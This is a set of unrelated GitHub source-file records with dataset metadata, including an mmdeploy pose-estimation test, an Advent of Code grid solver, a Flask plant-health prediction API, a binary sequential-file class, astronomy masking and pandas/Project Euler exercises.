generate_mmpose_deploy_config()\n\nonnx_file = NamedTemporaryFile(suffix='.onnx').name\ntask_processor = generate_mmpose_task_processor()\nimg_shape = (192, 256)\nheatmap_shape = (48, 64)\n# mmpose.apis.inference.LoadImage uses opencv, needs float32 in\n# cv2.cvtColor.\nimg = np.random.rand(*img_shape, 3).astype(np.float32)\nimg_path = 
'tests/data/tiger.jpeg'\nnum_output_channels = 17\n\n\n@pytest.mark.parametrize('imgs', [img, img_path])\ndef test_create_input(imgs):\n inputs = task_processor.create_input(imgs, input_shape=img_shape)\n assert isinstance(inputs, tuple) and len(inputs) == 2\n\n\ndef test_build_pytorch_model():\n from mmpose.models.pose_estimators.base import BasePoseEstimator\n model = task_processor.build_pytorch_model(None)\n assert isinstance(model, BasePoseEstimator)\n\n\n@pytest.fixture\ndef backend_model():\n from mmdeploy.backend.onnxruntime import ORTWrapper\n ort_apis.__dict__.update({'ORTWrapper': ORTWrapper})\n wrapper = SwitchBackendWrapper(ORTWrapper)\n wrapper.set(outputs={\n 'output': torch.rand(1, num_output_channels, *heatmap_shape),\n })\n\n yield task_processor.build_backend_model([''])\n\n wrapper.recover()\n\n\ndef test_build_backend_model(backend_model):\n assert isinstance(backend_model, torch.nn.Module)\n\n\ndef test_visualize():\n datasample = generate_datasample(img.shape[:2])\n output_file = NamedTemporaryFile(suffix='.jpg').name\n task_processor.visualize(\n img, datasample, output_file, show_result=False, window_name='test')\n\n\ndef test_get_tensor_from_input():\n data = torch.ones(3, 4, 5)\n input_data = {'inputs': data}\n inputs = task_processor.get_tensor_from_input(input_data)\n assert torch.equal(inputs, data)\n\n\ndef test_get_partition_cfg():\n try:\n _ = task_processor.get_partition_cfg(partition_type='')\n except NotImplementedError:\n pass\n\n\ndef test_get_model_name():\n model_name = task_processor.get_model_name()\n assert isinstance(model_name, str) and model_name is not None\n\n\ndef test_build_dataset_and_dataloader():\n from torch.utils.data import DataLoader, Dataset\n val_dataloader = model_cfg['val_dataloader']\n dataset = task_processor.build_dataset(\n dataset_cfg=val_dataloader['dataset'])\n assert isinstance(dataset, Dataset), 'Failed to build dataset'\n dataloader = task_processor.build_dataloader(val_dataloader)\n assert isinstance(dataloader, DataLoader), 'Failed to build dataloader'\n\n\ndef test_build_test_runner(backend_model):\n from mmdeploy.codebase.base.runner import DeployTestRunner\n temp_dir = TemporaryDirectory().name\n runner = task_processor.build_test_runner(backend_model, temp_dir)\n assert isinstance(runner, DeployTestRunner)\n\n\ndef test_get_preprocess():\n process = task_processor.get_preprocess()\n assert process is not None\n\n\ndef test_get_postprocess():\n process = task_processor.get_postprocess()\n assert isinstance(process, dict)\n","repo_name":"open-mmlab/mmdeploy","sub_path":"tests/test_codebase/test_mmpose/test_pose_detection.py","file_name":"test_pose_detection.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"70368764328","text":"from typing import Callable, Tuple, List\nimport re\nimport numpy as np \n\nGrid = np.ndarray\nCoord = Tuple[int, int]\nInstruction = Tuple[Callable, Coord, Coord]\n\n\ndef turn_on(grid: Grid, x: Coord, y: Coord, part: bool) -> Grid:\n if part:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = 1\n else:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] += 1\n return grid\n\n\ndef turn_off(grid: Grid, x: Coord, y: Coord, part: bool) -> Grid:\n if part:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = 0\n else:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = np.maximum(0, grid[x[0]:y[0]+1, x[1]:y[1]+1] - 1)\n return grid\n\n\ndef toggle(grid: Grid, x: Coord, y: Coord, part: bool) -> Grid:\n if part:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] = 1 - 
grid[x[0]:y[0]+1, x[1]:y[1]+1]\n else:\n grid[x[0]:y[0]+1, x[1]:y[1]+1] += 2\n return grid\n\n\ndef parse_instructions(inst: str) -> Instruction:\n if 'on' in inst:\n fn = turn_on\n elif 'off' in inst:\n fn = turn_off\n elif 'toggle' in inst:\n fn = toggle\n else:\n raise Exception(\"I don't understand that instruction\")\n\n coords = re.findall(r\"\\b\\d[\\d,.]*\\b\", inst)\n x, y = coords\n x = tuple((int(c) for c in x.split(',')))\n y = tuple((int(c) for c in y.split(',')))\n\n return (fn, x, y) \n\n\ndef run_instructions(grid: Grid, instructions: List[Instruction], part: bool) -> Grid:\n for fn, x, y in instructions:\n grid = fn(grid, x, y, part)\n return grid\n\n\ndef data(file, parser=str, sep='\\n') -> list:\n \"Split the day's input file into sections separated by `sep`, and apply `parser` to each.\"\n with open(file) as f:\n sections = f.read().rstrip().split(sep)\n return list(map(parser, sections))\n\n\nif __name__ == '__main__':\n import sys \n\n file = sys.argv[1]\n part = int(sys.argv[2])\n if part == 1:\n part = False\n elif part == 2:\n part = True\n else:\n raise Exception(f\"Don't know that part: {part}\")\n\n instructions = data(file, parse_instructions)\n grid = np.zeros((1000, 1000))\n grid = run_instructions(grid, instructions, part)\n print(np.sum(grid))\n","repo_name":"siddharth1199/aoc_2017","sub_path":"optum_aoc/2015/day06/i.py","file_name":"i.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26401896666","text":"import click\nfrom pathlib import Path\nfrom typing import Union, List\n\nfrom loguru import logger\nimport numpy as np\nimport pandas as pd\nimport scipy.stats\nfrom vivarium_public_health.risks.data_transformations import pivot_categorical\n\nfrom vivarium_conic_lsff import globals as project_globals\n\n\ndef len_longest_location() -> int:\n \"\"\"Returns the length of the longest location in the project.\n\n Returns\n -------\n Length of the longest location in the project.\n \"\"\"\n return len(max(project_globals.LOCATIONS, key=len))\n\n\ndef sanitize_location(location: str):\n \"\"\"Cleans up location formatting for writing and reading from file names.\n\n Parameters\n ----------\n location\n The unsanitized location name.\n\n Returns\n -------\n The sanitized location name (lower-case with white-space and\n special characters removed.\n\n \"\"\"\n # FIXME: Should make this a reversible transformation.\n return location.replace(\" \", \"_\").replace(\"'\", \"_\").lower()\n\n\ndef delete_if_exists(*paths: Union[Path, List[Path]], confirm=False):\n paths = paths[0] if isinstance(paths[0], list) else paths\n existing_paths = [p for p in paths if p.exists()]\n if existing_paths:\n if confirm:\n # Assumes all paths have the same root dir\n root = existing_paths[0].parent\n names = [p.name for p in existing_paths]\n click.confirm(f\"Existing files {names} found in directory {root}. Do you want to delete and replace?\",\n abort=True)\n for p in existing_paths:\n logger.info(f'Deleting artifact at {str(p)}.')\n p.unlink()\n\n\ndef read_data_by_draw(artifact_path: str, key : str, draw: int) -> pd.DataFrame:\n \"\"\"Reads data from the artifact on a per-draw basis. 
This\n is necessary for Low Birthweight Short Gestation (LBWSG) data.\n\n Parameters\n ----------\n artifact_path\n The artifact to read from.\n key\n The entity key associated with the data to read.\n draw\n The data to retrieve.\n\n \"\"\"\n key = key.replace(\".\", \"/\")\n with pd.HDFStore(artifact_path, mode='r') as store:\n index = store.get(f'{key}/index')\n draw = store.get(f'{key}/draw_{draw}')\n draw = draw.rename(\"value\")\n data = pd.concat([index, draw], axis=1)\n data = data.drop(columns='location')\n data = pivot_categorical(data)\n data[project_globals.LBWSG_MISSING_CATEGORY.CAT] = project_globals.LBWSG_MISSING_CATEGORY.EXPOSURE\n return data\n\n\nclass BetaParams:\n\n def __init__(self, upper_bound, lower_bound, alpha, beta):\n self.upper_bound = upper_bound\n self.lower_bound = lower_bound\n self.support_width = self.upper_bound - self.lower_bound\n self.alpha = alpha\n self.beta = beta\n\n @classmethod\n def from_statistics(cls, mean, upper_bound, lower_bound, variance=None):\n if variance is None:\n variance = confidence_interval_variance(upper_bound, lower_bound)\n support_width = (upper_bound - lower_bound)\n mean = (mean - lower_bound) / support_width\n variance /= support_width ** 2\n alpha = mean * (mean * (1 - mean) / variance - 1)\n beta = (1 - mean) * (mean * (1 - mean) / variance - 1)\n return cls(upper_bound, lower_bound, alpha, beta)\n\n\ndef sample_beta_distribution(seed: int, params: BetaParams) -> float:\n \"\"\"Gets a single random draw from a scaled beta distribution.\n\n Parameters\n ----------\n seed\n Seed for the random number generator.\n\n Returns\n -------\n The random variate from the scaled beta distribution.\n\n \"\"\"\n # Handle degenerate distribution\n if params.upper_bound == params.lower_bound:\n return params.upper_bound\n\n np.random.seed(seed)\n return params.lower_bound + params.support_width*scipy.stats.beta.rvs(params.alpha, params.beta)\n\n\nclass LogNormParams:\n\n def __init__(self, sigma, scale):\n self.sigma = sigma\n self.scale = scale\n\n @classmethod\n def from_statistics(cls, median, upper_bound):\n # 0.975-quantile of standard normal distribution (=1.96, approximately)\n q_975 = scipy.stats.norm().ppf(0.975)\n mu = np.log(median) # mean of normal distribution for log(variable)\n sigma = (np.log(upper_bound) - mu) / q_975\n return cls(sigma, median)\n\n\ndef sample_lognormal_distribution(seed: int, params: LogNormParams):\n # Handle degenerate distribution\n if params.sigma == 0:\n return params.scale\n\n np.random.seed(seed)\n return scipy.stats.lognorm.rvs(s=params.sigma, scale=params.scale)\n\n\ndef confidence_interval_variance(upper, lower):\n ninety_five_percent_spread = (upper - lower) / 2\n std_dev = ninety_five_percent_spread / (2 * 1.96)\n return std_dev ** 2\n","repo_name":"ihmeuw/vivarium_conic_lsff_2017","sub_path":"src/vivarium_conic_lsff/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72701439849","text":"'''\nImageDatabase\n\nThis is a very simple interface to the image database.\n\nIt is specifically designed for inserting photo metadata\nand EXIF data.\n\nThis class could be redesigned as an abstract class, and\nsubclasses could be designed for working with different\nkinds of databases.\n\nAt the moment, it does no cleanup, so it could benefit from\na close() method to clean up the database connection.\n\n'''\n\nimport psycopg2 as ps\n\nclass ImageDatabase:\n\n 
def __init__(self):\n        '''\n        Constructor\n\n        Connects to the postgres database in the postgres docker\n        container described in docker-compose.yml.\n\n        This could benefit\n        from arguments that take the DB connection parameters, or read\n        connection parameters in from a config file.\n        '''\n        self.conn = ps.connect(\n            dbname='postgres',\n            user='postgres',\n            host='db'\n        )\n        self.curs = self.conn.cursor()\n\n    def setup(self):\n        '''\n        Sets up the database tables.\n\n        Right now, it drops every table whenever it's run. It could\n        probably benefit from a boolean argument that determines\n        whether to drop a table if it exists or skip the creation.\n        tables.sql would need to be updated to facilitate such a\n        change.\n        '''\n        self.curs.execute(open('tables.sql', 'r').read())\n\n    def insert_photo(self, origin_url, filename, extension, height, width):\n        '''\n        Inserts photo metadata into the database.\n\n        This is straightforward and useful for the specific purposes of\n        the project. It's convenient, but also tightly coupled to the\n        image data source and this database schema.\n        '''\n        self.curs.execute('''\n            INSERT INTO images (origin_url, filename, extension, height, width)\n            VALUES (%s, %s, %s, %s, %s) RETURNING id\n        ''', (origin_url, filename, extension, height, width))\n        self.conn.commit()\n        return self.curs.fetchone()[0]\n\n    def insert_exif(self, image_id, tag_no, tag_name, value):\n        '''\n        Inserts photo EXIF data into the database\n\n        The main problem with this method is that it coerces the 'value'\n        argument to a string. Sometimes value is a primitive, sometimes\n        it's a collection. Our data would be easier to work with a different\n        database schema. tables.sql has more thoughts on that.\n        '''\n        self.curs.execute('''\n            INSERT INTO images_exif (image_id, tag_no, tag_name, value)\n            VALUES (%s, %s, %s, %s) \n        ''', (image_id, tag_no, tag_name, str(value)))\n        self.conn.commit()\n\nif __name__ == '__main__':\n    ImageDatabase().setup()\n","repo_name":"downpat/exif-scraper","sub_path":"scraper/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"8185956462","text":"import struct\r\nimport constants\r\nimport os\r\n\r\nclass Sequential_file:\r\n    def __init__(self, filename, record, blocking_factor, empty_key=-1):\r\n        self.filename = filename\r\n        self.record = record\r\n        self.header_size = struct.calcsize(\"ii\")\r\n        self.record_size = struct.calcsize(self.record.format) # record size\r\n        self.blocking_factor = blocking_factor\r\n        self.block_size = self.record_size * self.blocking_factor # block size\r\n        self.empty_key = empty_key\r\n\r\n    def initialize_file(self):\r\n        with open(self.filename, \"wb\") as f:\r\n            header = [5, 0]\r\n            br_slogova=[int(i) for i in header]\r\n            r = struct.pack(\"ii\", *br_slogova)\r\n            f.write(r)\r\n            block = self.blocking_factor * [self.get_empty_rec()] # create a block full of empty records\r\n            self.write_block(f, block)\r\n\r\n    def __find_in_block(self, block, rec):\r\n        for j in range(self.blocking_factor):\r\n            if block[j].get(\"evidencioni broj\") == self.empty_key or block[j].get(\"evidencioni broj\") > rec.get(\"evidencioni broj\"):\r\n                return (True, j)\r\n\r\n        return (False, None)\r\n\r\n    def insert_record(self, rec):\r\n        if self.find_by_id(rec.get(\"evidencioni broj\")): # every insert is preceded by a lookup\r\n            print(\"Already exists with ID {}\".format(rec.get(\"evidencioni broj\")))\r\n            return\r\n\r\n        with open(self.filename, \"rb+\") as f:\r\n            
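# skip the 8-byte file header (two ints, struct \"ii\") before scanning blocks\r\n            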
f.seek(self.header_size)\r\n            while True:\r\n                block = self.read_block(f)\r\n\r\n                if not block: # EOF\r\n                    break\r\n\r\n                last = self.__is_last(block)\r\n                here, j = self.__find_in_block(block, rec)\r\n\r\n                if not here:\r\n                    continue\r\n\r\n                # save last record for inserting into next block\r\n                tmp_rec = block[self.blocking_factor-1]\r\n                for k in range(self.blocking_factor-1, j, -1):\r\n                    block[k] = block[k-1] # move records\r\n                block[j] = rec # insert\r\n                rec = tmp_rec # new record for insertion\r\n\r\n                f.seek(-self.block_size, 1)\r\n                self.write_block(f, block)\r\n\r\n                # last block without empty rec?\r\n                if last and block[self.blocking_factor-1].get(\"evidencioni broj\") != self.empty_key:\r\n                    block = self.blocking_factor*[self.get_empty_rec()]\r\n                    self.write_block(f, block)\r\n\r\n    def __is_last(self, block):\r\n        for i in range(self.blocking_factor):\r\n            if block[i].get(\"evidencioni broj\") == self.empty_key:\r\n                return True\r\n        return False\r\n\r\n    def print_file(self):\r\n        i = 0\r\n        with open(self.filename, \"rb\") as f:\r\n            #header = f.read(self.header_size)\r\n            #print(\"Header \" + str(struct.unpack(\"ii\", header)))\r\n            f.seek(self.header_size)\r\n            while True:\r\n                block = self.read_block(f)\r\n\r\n                if not block:\r\n                    break\r\n\r\n                i += 1\r\n                print(\"Block {}\".format(i))\r\n                self.print_block(block)\r\n\r\n    def find_by_id(self, id):\r\n        i = 0\r\n        with open(self.filename, \"rb\") as f:\r\n            f.seek(self.header_size)\r\n            while True:\r\n                block = self.read_block(f)\r\n\r\n                if not block:\r\n                    return None\r\n\r\n                for j in range(self.blocking_factor):\r\n                    if block[j].get(\"evidencioni broj\") == id:\r\n                        return (i, j)\r\n                    if block[j].get(\"evidencioni broj\") > id:\r\n                        return None\r\n                i += 1\r\n\r\n    def delete_by_id(self, id):\r\n        found = self.find_by_id(id)\r\n\r\n        if not found:\r\n            return\r\n\r\n        block_idx = found[0]\r\n        rec_idx = found[1]\r\n        next_block = None\r\n\r\n        with open(self.filename, \"rb+\") as f:\r\n            #f.seek(self.header_size)\r\n            while True:\r\n                f.seek(8 + block_idx * self.block_size) # last block\r\n                block = self.read_block(f)\r\n\r\n                for i in range(rec_idx, self.blocking_factor-1):\r\n                    block[i] = block[i+1] # move records\r\n\r\n                if self.__is_last(block): # is last block full?\r\n                    f.seek(-self.block_size, 1)\r\n                    self.write_block(f, block)\r\n                    break\r\n\r\n                next_block = self.read_block(f)\r\n                # first record of next block is now the last of current one\r\n                block[self.blocking_factor-1] = next_block[0]\r\n                f.seek(-2*self.block_size, 1)\r\n                self.write_block(f, block)\r\n\r\n                block_idx += 1\r\n                rec_idx = 0\r\n\r\n        if next_block and next_block[0].get(\"evidencioni broj\") == self.empty_key:\r\n            os.ftruncate(os.open(self.filename, os.O_RDWR),\r\n                         block_idx * self.block_size + 8)\r\n\r\n    def write_block(self, file, block):\r\n        binary_data = bytearray() # byte buffer that will be written to the file\r\n\r\n        # serialize every record in the block and append it to the byte buffer\r\n        for rec in block:\r\n            rec_binary_data = self.record.dict_to_encoded_values(rec)\r\n            binary_data.extend(rec_binary_data)\r\n\r\n        file.write(binary_data)\r\n\r\n    def read_block(self, file):\r\n        # read from the current position\r\n        binary_data = file.read(self.block_size)\r\n        block = []\r\n\r\n        if len(binary_data) == 0:\r\n            return block\r\n\r\n        for i in range(self.blocking_factor): # slice out the bytes for each record, then unpack them\r\n            begin = self.record_size*i\r\n            end = self.record_size*(i+1)\r\n            block.append(self.record.encoded_tuple_to_dict(\r\n                binary_data[begin:end]))\r\n\r\n        return block\r\n\r\n    def 
write_record(self, f, rec):\r\n binary_data = self.record.dict_to_encoded_values(rec)\r\n f.write(binary_data)\r\n\r\n def read_record(self, f):\r\n binary_data = f.read(self.record_size)\r\n\r\n if len(binary_data) == 0:\r\n return None\r\n\r\n return self.record.encoded_tuple_to_dict(binary_data)\r\n\r\n def print_block(self, b):\r\n for i in range(self.blocking_factor):\r\n print(b[i])\r\n\r\n def get_empty_rec(self):\r\n return {\"evidencioni broj\": self.empty_key, \"registarska oznaka\": \"\", \"datum i vreme\": \"\", \"oznaka parking mesta\": \"\", \"duzina boravka\": \"\", \"status\": 0}","repo_name":"SasteS/SequentialFile","sub_path":"Projekat1/sequential_file.py","file_name":"sequential_file.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6739145402","text":"nested_list=[[1,2,3,4,5], [6,7,8,9,10],[1000,1000]]\ndef nest_sum(nested_list):\n '''Write a function called nested_sum that\n takes a list of lists of integers and adds up\n the elements from all of the nested lists. For example:'''\n ans=0\n for num_list in nested_list:\n for number in num_list:\n ans= ans+number\n return ans\nprint(str(nest_sum(nested_list)))","repo_name":"balbazauras/think-python","sub_path":"Chapter10_lists/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16949384664","text":"import os\nimport glob\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.table import Table\nfrom astropy.coordinates import SkyCoord\n\n\n#####################\n### set keys\n#####################\ndir_fits = \"/Users/saito/data/myproj_active/proj_santoro01_ngc1365/data_raw/\"\ndir_product = \"/Users/saito/data/myproj_active/proj_santoro01_ngc1365/products/\"\ncatalog_fits = \"ngc1365_co21_v1p0_props.fits\"\nmom0_fits = \"ngc1365_12m+7m+tp_co21_broad_mom0.fits\"\noutput = \"ngc1365_cprops_mask_1p38_deconv.fits\"\nsnr = 5.0 # peak signal-to-noise ratio threshold to identify clouds\nscale = 120.0 / 1.378 # parsec / arcsec\nimage_ra_cnt = \"03:33:36.406\"\nimage_decl_cnt = \"-36.08.24.023\"\n\n\n#####################\n### Main Procedure\n#####################\ndone = glob.glob(dir_product)\nif not done:\n os.mkdir(dir_product)\n\nhdu_list = fits.open(dir_fits + catalog_fits, memmap=True)\ndata = Table(hdu_list[1].data)\n\ngmc_ra_dgr = data[\"XCTR_DEG\"] # center ra position of the cloud in decimal degrees\ngmc_decl_dgr = data[\"YCTR_DEG\"] # center decl position of the cloud in decimal degrees\ngmc_radius_pc = data[\"RAD_NOEX\"] # the deconvolved radius without extrapolation in parsecs\ngmc_sn_ratio = data[\"S2N\"] # the peak signal-to-noise ratio in the cloud\n#gmc_maj = data[\"FWHM_MAJ_DC\"]\n#gmc_min = data[\"FWHM_MAJ_DC\"]\n#gmc_pa = data[\"POSANG\"] * 180 / np.pi\n\ncut = (gmc_radius_pc > 0.) 
& (gmc_sn_ratio > snr)\n\ngmc_ra_dgr = gmc_ra_dgr[cut]\ngmc_decl_dgr = gmc_decl_dgr[cut]\ngmc_radius_arcsec = gmc_radius_pc[cut] / scale\n\n# get native grid information\nnum_x_pix = imhead(dir_fits+mom0_fits,mode=\"list\")[\"shape\"][0]\nnum_y_pix = imhead(dir_fits+mom0_fits,mode=\"list\")[\"shape\"][1]\npix_radian = imhead(dir_fits+mom0_fits,mode=\"list\")[\"cdelt2\"]\nobsfreq = imhead(dir_fits+mom0_fits,mode=\"list\")[\"restfreq\"][0]/1e9\npix_arcsec = round(pix_radian * 3600 * 180 / np.pi, 3)\n\n# create image\n# create template image\nblc_ra_tmp = imstat(dir_fits+mom0_fits)[\"blcf\"].split(\", \")[0]\nblc_dec_tmp = imstat(dir_fits+mom0_fits)[\"blcf\"].split(\", \")[1]\nblc_ra = blc_ra_tmp.replace(\":\",\"h\",1).replace(\":\",\"m\",1)+\"s\"\nblc_dec = blc_dec_tmp.replace(\".\",\"d\",1).replace(\".\",\"m\",1)+\"s\"\nbeamsize = round(imhead(dir_fits+mom0_fits,\"list\")[\"beammajor\"][\"value\"], 2)\npix_size = round(beamsize/4.53, 2)\nsize_x = num_x_pix # int(image_length / pix_size)\nsize_y = num_y_pix # size_x\nc = SkyCoord(blc_ra, blc_dec)\nra_dgr = str(c.ra.degree)\ndec_dgr = str(c.dec.degree)\ncl.done()\n\nfor i in range(len(gmc_radius_arcsec)):\n direction = \"J2000 \" + str(gmc_ra_dgr[i])+\"deg \" + str(gmc_decl_dgr[i])+\"deg\"\n cl.addcomponent(dir=direction,\n flux=1.0,\n fluxunit=\"Jy\",\n freq=str(obsfreq)+\"GHz\",\n shape=\"disk\",\n majoraxis=str(gmc_radius_arcsec[i])+\"arcsec\",\n minoraxis=str(gmc_radius_arcsec[i])+\"arcsec\",\n positionangle=\"0deg\")\n\nia.fromshape(dir_product+output.replace(\".fits\",\".im\"),[size_x,size_y,1,1],overwrite=True)\ncs=ia.coordsys()\ncs.setunits([\"rad\",\"rad\",\"\",\"Hz\"])\ncell_rad=qa.convert(qa.quantity(str(pix_size)+\"arcsec\"),\"rad\")[\"value\"]\ncs.setincrement([-cell_rad,cell_rad],\"direction\")\ncs.setreferencevalue([qa.convert(image_ra_cnt,\"rad\")[\"value\"],\n qa.convert(image_decl_cnt,\"rad\")[\"value\"]],\n type=\"direction\")\ncs.setreferencevalue(str(obsfreq)+\"GHz\",\"spectral\")\ncs.setincrement(\"1GHz\",\"spectral\")\nia.setcoordsys(cs.torecord())\nia.setbrightnessunit(\"Jy/pixel\")\nia.modify(cl.torecord(),subtract=False)\n\nimmath(imagename=dir_product+output.replace(\".fits\",\".im\"),\n expr=\"iif(IM0>0,1,0)\",\n outfile=dir_product+output.replace(\".fits\",\".im2\"))\n\nexportfits(imagename=dir_product+output.replace(\".fits\",\".im2\"),\n fitsimage=dir_product+output,\n overwrite=True)\n\nos.system(\"rm -rf \" + dir_product + output.replace(\".fits\",\".im\"))\nos.system(\"rm -rf \" + dir_product + output.replace(\".fits\",\".im2\"))\n\ncl.close()\n\nos.system(\"rm -rf *.last\")\n","repo_name":"toshikisaito1005/mycasa_scripts","sub_path":"mycasa_scripts_active/scripts_santoro01_ngc1365/cprops2mask_deconv_circle.py","file_name":"cprops2mask_deconv_circle.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12952590793","text":"# Importing essential libraries\nfrom flask import Flask, render_template, request, jsonify\nimport pickle\nimport numpy as np\nfrom flask_cors import CORS\nfrom os.path import join, dirname, realpath\nimport warnings\n\n# Suppressing all warnings\nwarnings.filterwarnings('ignore')\n\n# Initializing Flask app\napp = Flask(__name__)\napp.secret_key = \"planthealthcare\"\nCORS(app) # Enabling CORS\n\n# Load the KNN Trained model Weights and Scaler\nprint('Wait Model Is Loading')\n\n# Load the saved scaler\nscalar_file = join(dirname(realpath(__file__)), 'fitted_scaler.pkl')\nwith 
open(scalar_file, 'rb') as file:\n loaded_scaler = pickle.load(file) # Loading the scaler object\n\n# Get the absolute path to the pickle file containing the trained model\nfilename = join(dirname(realpath(__file__)), 'best_knn_classifier.pickle')\n\n# Load the trained model\nwith open(filename, 'rb') as file:\n knn_classifier = pickle.load(file) # Loading the model object\n\nprint('Successfully Loaded')\n\n\n@app.route('/')\ndef home():\n \"\"\"\n Home route to check if the server is active.\n :return: A string indicating that the server is active.\n \"\"\"\n return 'Server is active and ready to give service related to plant health care.'\n\n\n@app.route('/predict/api', methods=['POST'])\ndef predict():\n \"\"\"\n API endpoint to predict the plant health based on the received parameters.\n It receives the parameters as JSON and returns the prediction as JSON.\n :return: A JSON object containing the status and the prediction or an error message.\n \"\"\"\n if request.method == 'POST':\n try:\n data = request.json # Getting the data sent in JSON format\n # Extracting individual parameters from the received JSON data\n Light = float(data['light'])\n Nitrogen = float(data['nitrogen'])\n Phosphorus = float(data['phosphorus'])\n Potassium = float(data['potassium'])\n Humidity = float(data['humidity'])\n Temp1 = float(data['temp1'])\n Temp2 = float(data['temp2'])\n Moisture = float(data['moisture'])\n\n # Preparing the input data\n input_data = np.array(\n [[Light, Nitrogen, Phosphorus,\tPotassium,\t Humidity,\tTemp1,\tTemp2,\t Moisture]])\n\n # Scaling the input data using the loaded scaler\n new_data = loaded_scaler.transform(input_data)\n\n # Making prediction using the loaded model\n my_prediction = knn_classifier.predict(new_data)\n\n # Mapping the predicted class to the respective plant health category\n class_mapping = {0: 'Healthy', 1: 'Moderate', 2: 'Unhealthy'}\n # Getting the final result\n final_result = class_mapping[my_prediction[0]]\n\n # Returning the prediction as JSON\n return jsonify(status='success', prediction=final_result.upper())\n\n except Exception as e:\n # Returning the error message as JSON\n return jsonify(status='error', message=str(e))\n\n # Returning an error message if the method is not allowed\n return jsonify(status='error', message='Method not allowed')\n\n\nif __name__ == '__main__':\n app.run(debug=True) # Running the app in debug mode\n","repo_name":"jawadahmed2/Plant-Health-Prediction-From-Sensors-Data","sub_path":"Server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"349669046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 11 23:33:47 2021\n\n@author: Stian\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\nimport matplotlib.image as mpimg\nimport matplotlib.animation as animation\n\nimport cv2\n\nlinename = \"linje9\"\n\nimg = cv2.imread('lines/'+linename+'.png',0)\nimg[img > 1] = 255\n\nwhere_pixels = np.where(img == 0)\ncoords = np.array([(y,x, str(y)+str(x)) for x,y in zip(where_pixels[0], where_pixels[1])])\n\n\ndef give_nearest_coords(coords):\n coords_in_order = [(int(coords[0][0]), int(coords[0][1]))]\n active_coords = coords[1:]\n \n x,y,string_coord = coords[0]\n \n while len(active_coords) > 0:\n #print(len(active_coords))\n \n next_coords = find_nearest(int(x), int(y), active_coords)\n \n if next_coords:\n # pop out x,y in active_coords\n idx = 
np.where(active_coords[:,2] == string_coord)\n            active_coords = np.delete(active_coords, idx[0], axis=0)\n            \n            x,y,dist,string_coord = next_coords\n            coords_in_order.append((int(x),int(y)))\n        else:\n            coords_in_order.append((int(x),int(y)))\n            active_coords = np.delete(active_coords, 0, axis=0)\n        \n    return coords_in_order\n    \n\n\n\ndef find_nearest(x,y, coords):\n    all_distances = []\n    for x_, y_,string_coord in coords:\n        avstand = np.sqrt((x-int(x_))**2 + (y-int(y_))**2) # Euclidean distance\n        if avstand > 0:\n            all_distances.append((x_,y_, avstand, string_coord))\n    if len(all_distances) > 0:\n        return sorted(all_distances, key=lambda k: k[2])[0]\n    \n\na = give_nearest_coords(coords)\nlinje1 = pd.DataFrame(a, columns=[\"x\", \"y\"])\nlinje1.to_csv(\"lines/\"+linename+\".csv\")\n\n    \n    \n    \n    \n    ","repo_name":"stianteien/TrainsWithBrains","sub_path":"make_line.py","file_name":"make_line.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"39241807357","text":"from time import time\n\nisPall = lambda s : str(s)==str(s)[::-1]\n\nstart = time()\n# try every pair of three-digit factors\nans = max(i*j for i in range(100, 1000) for j in range(i, 1000) if isPall(i*j))\n\nif __name__ == \"__main__\":\n    print(f\"\\nAnswer: { ans }\")\n    print(f\"Time taken: { time() - start }\\n\")\n","repo_name":"fermihacker/Project-Euler","sub_path":"Python/Problem004.py","file_name":"Problem004.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"18764448713","text":"import pandas as pd\n\n# Single series examples\na = [1, 7, 2]\n\nmyseries = pd.Series(a, index = [\"x\", \"y\", \"z\"])\n\nprint(myseries)\n\n# names\n\ndata = {\n  \"thad moments\" : [0, 2, 4],\n  \"jai moments\" : [4, 2, 1]\n}\n\ndf = pd.DataFrame(data, index = [\"day 1\", \"day 2\", \"day 3\"])\nprint(df)\nprint(df.loc[\"day 1\"])","repo_name":"jgoetzmann/programming-classes","sub_path":"dataVis/Day04-Pandas/pandastest.py","file_name":"pandastest.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
